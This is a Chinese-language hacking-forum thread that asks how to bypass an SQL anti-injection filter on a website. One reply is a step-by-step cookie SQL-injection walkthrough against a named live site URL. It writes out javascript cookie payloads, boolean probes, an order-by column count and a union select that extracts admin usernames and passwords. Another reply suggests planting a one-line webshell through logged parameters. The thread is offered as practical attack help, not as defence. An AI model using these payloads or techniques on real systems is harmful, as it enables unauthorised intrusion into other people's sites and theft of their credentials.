查看: 3220|回复: 8

求大神,过防注入!

[复制链接]
  • TA的每日心情
    擦汗
    2015-5-27 23:43
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-6-30 04:36:16 | 显示全部楼层 |阅读模式
    悬赏9i币未解决
    大家看看,怎么过该Sql防注入系统,遇到过好几次了。  爆菊
    QQ截图20140630043515.png

    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-6-30 05:54:45 | 显示全部楼层
    [注入语句:javascript:alert(document.cookie="ID="+escape("153"));
    找个带参数的链接……http://www.zyjfsh.com/ProductShow.asp?ID=153
    看见没有,有防注入系统……但大多可以通过中转注入搞定 我这就手工来COOKIE注入吧!
    现在来检测能不能注入……javascript:alert(document.cookie="ID="+escape("153 and 1=1"));
    and 1=1返回 正常页面 javascript:alert(document.cookie="ID="+escape("153 and 1=2"));
    and 1=2出错 说明存在注入漏洞
    然后我们构造语句来查询字段:javascript:alert(document.cookie="ID="+escape("153 order by 10"));正常 再往上猜javascript:alert(document.cookie="ID="+escape("153 order by 20"));
    20也正常 再加 javascript:alert(document.cookie="ID="+escape("153 order by 30"));
    30出错,说明大于20小于30  javascript:alert(document.cookie="ID="+escape("153 order by 25"));
    25也正常 大于25小于30     javascript:alert(document.cookie="ID="+escape("153 order by 26"));
    26正常                    javascript:alert(document.cookie="ID="+escape("153 order by 27"));
    27出错  说明就是26
    接着构造语句查表          javascript:alert(document.cookie="ID="+escape("153 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));
    2 7 9 15 3是显示位  我们随便找两个显示位来显示就行了
    然后猜表里的字段:javascript:alert(document.cookie="ID="+escape("153 union select 1,username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin"));/color]

    点评

    不存在COOKIE注入。  详情 回复 发表于 2014-6-30 15:26
    不存在COOKIE注入。  详情 回复 发表于 2014-6-30 15:26
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-6-30 06:23:02 | 显示全部楼层
    你不能详细的说明问题么  

    点评

    过滤"select","'","and","or","union",";"等等,大小写也无用,转换字符无用,用sqlmap tamper测试也无果,不存在COOKIE注入。  详情 回复 发表于 2014-6-30 15:26
    回复

    使用道具 举报

  • TA的每日心情

    2019-6-3 21:25
  • 签到天数: 116 天

    [LV.6]常住居民II

    发表于 2014-6-30 11:26:41 | 显示全部楼层
    COOKIE试试

    点评

    不存在COOKIE注入。  详情 回复 发表于 2014-6-30 15:27
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2015-5-27 23:43
  • 签到天数: 1 天

    [LV.1]初来乍到

     楼主| 发表于 2014-6-30 15:26:12 | 显示全部楼层
    神仙 发表于 2014-6-30 06:23
    你不能详细的说明问题么

    过滤"select","'","and","or","union",";"等等,大小写也无用,转换字符无用,用sqlmap tamper测试也无果,不存在COOKIE注入。
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2015-5-27 23:43
  • 签到天数: 1 天

    [LV.1]初来乍到

     楼主| 发表于 2014-6-30 15:26:29 | 显示全部楼层
    zyc2483 发表于 2014-6-30 05:54
    [注入语句:javascript:alert(document.cookie="ID="+escape("153"));
    找个带参数的链接……http://www.zyj ...

    不存在COOKIE注入。
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2015-5-27 23:43
  • 签到天数: 1 天

    [LV.1]初来乍到

     楼主| 发表于 2014-6-30 15:26:53 | 显示全部楼层
    zyc2483 发表于 2014-6-30 05:54
    [注入语句:javascript:alert(document.cookie="ID="+escape("153"));
    找个带参数的链接……http://www.zyj ...

    不存在COOKIE注入。
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2015-5-27 23:43
  • 签到天数: 1 天

    [LV.1]初来乍到

     楼主| 发表于 2014-6-30 15:27:08 | 显示全部楼层

    不存在COOKIE注入。
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-7-1 15:28:26 | 显示全部楼层
    貌似这个防注入系统只有一个办法就是 直接插一句话。 在参数那里  因为那个系统会保存下每一次的恶意操作到数据库中。如果数据库的后缀是可解析的。。 那就可以连接一句话了。 找不到数据库就没办法了。。 坐等大神解答
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-24 18:48 , Processed in 0.032301 second(s), 18 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部